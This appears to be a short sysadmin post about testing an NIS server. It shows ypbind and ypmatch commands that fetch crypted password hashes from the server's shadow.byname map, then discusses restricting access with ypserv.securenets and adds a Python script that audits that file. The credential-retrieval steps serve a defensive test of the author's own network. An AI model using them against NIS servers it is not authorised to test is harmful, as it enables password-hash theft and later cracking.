I tested hacking NIS from my laptop
$ sudo apt-get install nis
$ sudo vi yp.conf
add "ypserver 192.168.20.1" (AKA the NIS server's IP address)
$ sudo vi defaultdomain
(I knew I had limited access to the NIS server to just the subnet, so I made sure to be on the same network)
$ sudo ypbind -d
parsing config file
Trying entry: ypserver 192.168.20.1
parsed ypserver 192.168.20.1
add_server() domain: nisdomain, host: 18.104.22.168, nobroadcast, slot: 0
[Welcome to ypbind-mt, version 1.8]
ping host '192.168.20.1', domain 'nisdomain'
Answer for domain 'nisdomain' from server '192.168.20.1'
Pinging all active server.
$ ypmatch diane shadow
Can't match key diane in map shadow. Reason: No such map in server's domain
$ ypmatch diane passwd.byname
$ sudo ypmatch diane shadow.byname
Needless to say, the crypted password is a bogus string and the domain name and IP addresses have been changed to protect the innocent.
Though one coworker did suggest a solution: explicitly put the IP addresses of all the machines that should have access in the ypserv.securenets file.
That did work, though if an "evildoer" can steal one of my IP addresses they can still get the crypted passwords.
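To check what a given ypserv.securenets actually admits, here is an added example (not part of the original post) that parses the file's two entry forms, `<netmask> <network>` and `host <address>`, and reports which entries are wider than a single machine. The sample files, addresses and function names are constructed for illustration. The file filters on source IP only, so any client holding an admitted address still receives the maps.

```python
import ipaddress

# Constructed sample files; addresses are illustrative only.
SUBNET_WIDE = """\
# allow localhost
255.0.0.0       127.0.0.0
# the whole subnet may query the maps
255.255.255.0   192.168.20.0
"""

HOST_ONLY = """\
255.0.0.0       127.0.0.0
host            192.168.20.11
host            192.168.20.12
255.255.255.255 192.168.20.13
"""

def parse_securenets(text):
    """Return the networks a securenets file admits."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        first, second = line.split()
        if first.lower() == "host":           # "host <address>" form
            nets.append(ipaddress.ip_network(second + "/32"))
        else:                                  # "<netmask> <network>" form
            nets.append(ipaddress.ip_network(f"{second}/{first}"))
    return nets

def is_allowed(nets, client):
    """True if the client's source address matches any entry."""
    addr = ipaddress.ip_address(client)
    return any(addr in net for net in nets)

def broad_entries(nets, max_hosts=1):
    """Non-loopback entries that admit more than max_hosts addresses."""
    return [n for n in nets if not n.is_loopback and n.num_addresses > max_hosts]

if __name__ == "__main__":
    for name, text in (("subnet-wide", SUBNET_WIDE), ("host-only", HOST_ONLY)):
        nets = parse_securenets(text)
        print(name, "laptop on subnet admitted:", is_allowed(nets, "192.168.20.57"))
        print(name, "broad entries:", [str(n) for n in broad_entries(nets)])
```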